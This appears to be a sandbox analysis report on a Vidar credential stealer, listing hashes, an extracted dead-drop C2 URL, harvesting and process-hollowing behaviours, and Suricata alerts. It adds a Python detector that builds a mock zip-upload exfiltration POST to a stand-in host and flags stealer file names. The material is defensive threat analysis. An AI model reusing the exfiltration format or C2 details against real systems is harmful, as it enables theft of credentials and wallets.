General
- Target: 32240716f56a089ce49fcd044d20d7e8
- Size: 1.0MB
- Sample: 210917-gyrb2ahgcr
- MD5: 32240716f56a089ce49fcd044d20d7e8
- SHA1: fb8ea0782fd0a016608e456882b2a0fafe978405
- SHA256: 8117405a4dfe0e21ae2064f1a129da59dbc31d3830967e43e0b63f9c52b058c1
- SHA512: c415146be9d72e204d4bf6528f076f6a6885e5e3e6cbc0f1cba6a35b6da80bde576b6444c74e0925dbcadc959562f72b69756a04a534e75ed7b08fa6889649a9
Static task: static1
Behavioral task: behavioral1
- Sample: 32240716f56a089ce49fcd044d20d7e8.exe
- Resource: win7-en-20210916
Malware Config
Extracted
- Family: vidar
- Version: 40.6
- Botnet: 921
- C2: https://dimonbk83.tumblr.com/
- profile_id: 921
The Tumblr URL is not the upload server itself. Vidar builds of this generation read a public profile page to obtain the address of the real C2 at runtime, so the extracted URL is a dead-drop resolver; the host that actually receives the stolen data only shows up in the behavioral task's network capture, and both should be blocked or monitored.
Targets
- Target: 32240716f56a089ce49fcd044d20d7e8
- Size: 1.0MB
- MD5: 32240716f56a089ce49fcd044d20d7e8
- SHA1: fb8ea0782fd0a016608e456882b2a0fafe978405
- SHA256: 8117405a4dfe0e21ae2064f1a129da59dbc31d3830967e43e0b63f9c52b058c1
- SHA512: c415146be9d72e204d4bf6528f076f6a6885e5e3e6cbc0f1cba6a35b6da80bde576b6444c74e0925dbcadc959562f72b69756a04a534e75ed7b08fa6889649a9
- suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
- suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
- suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
- Vidar Stealer
- Downloads MZ/PE file
- Deletes itself
- Loads dropped DLL
- Accesses cryptocurrency files/wallets, possible credential harvesting
- Checks installed software on the system
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Suspicious use of SetThreadContext
  SetThreadContext on another process's thread is the usual final step of process hollowing: a payload is written into a suspended child and the thread's entry point is redirected to it.
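The three Suricata alerts above all key on the same exfiltration pattern: the stealer zips the harvested files and uploads the archive in an outbound POST, so the zip's local file headers, and with them entry names such as Passwords.txt, are visible in cleartext in the request body. The following detector is an added example and is not the sandbox's or Suricata's own rule logic; it scans a raw request for zip local file headers and flags known stealer entry names. The POST body, the form field, the host c2.example and the list of suspicious names other than Passwords.txt are constructed for the example.

```python
"""
Added example, not part of the sandbox report and not Suricata's rule text:
a detector for the exfil pattern behind the alert
'Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)'.
A zip archive embedded in a multipart POST exposes its entry names in each
local file header, so a raw body scan recovers them without parsing the
multipart envelope and still works on a truncated capture.
"""
import io
import struct
import zipfile

# Only Passwords.txt comes from the report's alert; the other names are an
# assumption about what stealer archives usually contain.
SUSPICIOUS_ENTRY_NAMES = {"passwords.txt", "information.txt", "cookies.txt"}

ZIP_LOCAL_HEADER = b"PK\x03\x04"


def zip_entry_names(data: bytes) -> list[str]:
    """Return the entry names of every zip local file header found in data.

    Local file header layout (PKWARE APPNOTE 4.3.7): 4-byte signature, 22 bytes
    of fixed fields, 2-byte name length at offset 26, 2-byte extra length at
    offset 28, and the name itself starting at offset 30.
    """
    names = []
    pos = data.find(ZIP_LOCAL_HEADER)
    while pos != -1:
        if pos + 30 > len(data):
            break  # header truncated by the capture
        name_len, _extra_len = struct.unpack_from("<HH", data, pos + 26)
        name = data[pos + 30 : pos + 30 + name_len]
        if len(name) == name_len:
            names.append(name.decode("utf-8", errors="replace"))
        pos = data.find(ZIP_LOCAL_HEADER, pos + 4)
    return names


def inspect_post(request: bytes) -> dict:
    """Classify one raw HTTP request: is it a POST whose body carries a zip
    with stealer-style entry names? Directory prefixes are ignored so that
    Browsers/Chrome/Cookies.txt still matches cookies.txt."""
    head, _, body = request.partition(b"\r\n\r\n")
    is_post = head.startswith(b"POST ")
    names = zip_entry_names(body) if is_post else []
    hits = [n for n in names if n.rsplit("/", 1)[-1].lower() in SUSPICIOUS_ENTRY_NAMES]
    return {"post": is_post, "zip_entries": names, "suspicious": hits, "alert": bool(hits)}


def build_stealer_post() -> bytes:
    """Constructed sample: a multipart POST uploading a zip of 'stolen' files.
    Host, path and form field name are invented for the example."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Passwords.txt", "example.com\tuser\tpass\n")
        zf.writestr("Browsers/Chrome/Cookies.txt", "")
        zf.writestr("information.txt", "OS: Windows 7\n")
    archive = buf.getvalue()
    boundary = b"----ExampleBoundary"
    body = (
        b"--" + boundary + b"\r\n"
        b'Content-Disposition: form-data; name="file"; filename="data.zip"\r\n'
        b"Content-Type: application/zip\r\n\r\n" + archive + b"\r\n"
        b"--" + boundary + b"--\r\n"
    )
    return (
        b"POST /upload HTTP/1.1\r\nHost: c2.example\r\n"
        b"Content-Type: multipart/form-data; boundary=" + boundary + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body
    )


def build_benign_post() -> bytes:
    """Constructed sample: a legitimate zip upload that must not alert."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4\n")
    return b"POST /upload HTTP/1.1\r\nHost: files.example\r\n\r\n" + buf.getvalue()


if __name__ == "__main__":
    for req in (build_stealer_post(), build_benign_post()):
        print(inspect_post(req))
```

Matching on local file headers rather than on the multipart filename is deliberate: the outer filename (data.zip here) is chosen by the attacker and says nothing, whereas the entry names reflect what the stealer actually collected, which is why the ET signature names Passwords.txt rather than the archive.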